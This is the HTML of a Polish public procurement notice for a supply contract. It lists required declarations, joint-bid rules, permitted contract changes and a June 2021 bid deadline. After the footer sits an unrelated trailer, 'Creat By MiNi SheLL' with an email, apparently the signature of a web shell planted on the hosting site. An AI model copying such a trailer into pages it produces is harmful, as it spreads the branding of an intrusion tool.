5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:–<br/>oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>( t.j. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, zamawiający może żądać od wykonawcy odpisu lub informacji z Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru. 2. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których<br/>mowa w ust. 1, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. 3. Jeżeli<br/>w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z<br/>dokumentów, o których mowa w ust. 1, zamawiający może żądać od wykonawcy<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>wykonawcy. 4. Przepis ust. 3 stosuje się odpowiednio do osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. 5. Przepisy ust.<br/>1-3 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby<br/>na zasadach określonych w art. 118 ustawy lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby na takich zasadach. 6. W przypadku wskazania przez wykonawcę<br/>dostępności podmiotowych środków dowodowych lub dokumentów, o których mowa w ust. 1,<br/>pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych,<br/>zamawiający może żądać od wykonawcy przedstawienia tłumaczenia na język polski pobranych<br/>samodzielnie przez zamawiającego podmiotowych środków dowodowych lub dokumentów <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w SWZ, oraz spełniają określone przez Zamawiającego warunki udziału<br/>w postępowaniu. 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają<br/>warunki dotyczące:1) zdolności do występowania w obrocie gospodarczym:Zamawiający nie<br/>stawia warunku w powyższym zakresie.2) uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:Zamawiający nie stawia<br/>warunku w powyższym zakresie.3) sytuacji ekonomicznej lub finansowej:Zamawiający nie<br/>stawia warunku w powyższym zakresie.4) zdolności technicznej lub zawodowej:Zamawiający nie<br/>stawia warunku w powyższym zakresie. 3. Zamawiający, w stosunku do Wykonawców wspólnie<br/>ubiegających się o udzieleniezamówienia, w odniesieniu do warunku dotyczącego zdolności<br/>technicznej lub zawodowej –dopuszcza łączne spełnianie warunku przez Wykonawców. 4.<br/>Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w<br/>inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy muszą być zgodne z ustawą Prawo zamówień publicznych.<br/>Zamawiający przewiduje, że w ramach umowy można zmienić:1) termin realizacji zamówienia, w<br/>przypadku uzasadnionych okoliczności, niezależnych od Wykonawcy i którym nie jest w stanie<br/>przeciwdziałać (np.: opóźnienia w dostawie asortymentu od producenta, itp.). W takim<br/>przypadku strony mogą przesunąć termin realizacji o czas niezbędny do realizacji przedmiotu<br/>umowy, przy czym Wykonawca jest zobowiązany wykazać Zamawiającemu, że nie jest w stanie<br/>dotrzymać terminu z przyczyn od niego niezależnych, a Zamawiający ma prawo żądać w tym<br/>zakresie dodatkowych wyjaśnień lub dokumentów w terminie przez niego wskazanym.2)<br/>personel związany z realizacja zamówienie w tym nie będący stroną umowy tzn.<br/>,,Zamawiającym” i ,,Wykonawcą”. Wskazana zmiana może nastąpić w przypadku wystąpienia<br/>zaniedbań w zakresie realizacji przedmiotu zamówienia; zmian organizacyjnych lub w przypadku<br/>zaistnienia zdarzeń losowych. Zmieniamy personel musi również spełniać warunki postawione<br/>na etapie postępowania przetargowego, co Wykonawca wykaże Zamawiającemu;3) adres<br/>siedziby Wykonawcy. 4) zakres przedmiotu zamówienia (zmniejszenie zakresu zamówienia) w<br/>sytuacji wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie całego zakresu<br/>umowy nie leży w interesie publicznym/interesie Zamawiającego, czego nie można było<br/>przewidzieć w chwili zawarcia umowy. Wynagrodzenie zostanie obniżone o wartość zakresu<br/>usługi, która nie zostanie zrealizowana;5) asortyment wchodzący w zakres przedmiotu<br/>zamówienia w okolicznościach niezależnych od Wykonawcy, np. w wyniku zakończenia<br/>wytwarzania danego asortymentu objętego przedmiotem zamówienia lub wycofanie go z<br/>produkcji lub z obrotu na terytorium Polski, czego Wykonawca nie mógł przewidzieć na etapie<br/>składania oferty, Zamawiający dopuszcza zmianę polegającą na dostarczeniu produktu<br/>zastępczego o podobnym charakterze edukacyjnym, za cenę jednostkową nie wyższą niż<br/>zaoferowana w ofercie oraz spełniającego wymogi określone w SWZ. W takiej sytuacji<br/>Wykonawca ma obowiązek wykazać okoliczności wskazane w zdaniu pierwszym, a<br/>Zamawiający ma prawo żądać w tym zakresie dodatkowych wyjaśnień lub dokumentów w<br/>terminie przez niego wskazanym. 6) stawkę podatku VAT w przypadku zmiany przepisów<br/>dotyczących jego wysokości. W takim przypadku o nową stawkę podatku VAT zostanie<br/>skorygowane wynagrodzenie Wykonawcy;7) podwykonawcę lub zrezygnować z podwykonawcy<br/>w okolicznościach wynikających z potrzeb Wykonawcy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-29 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com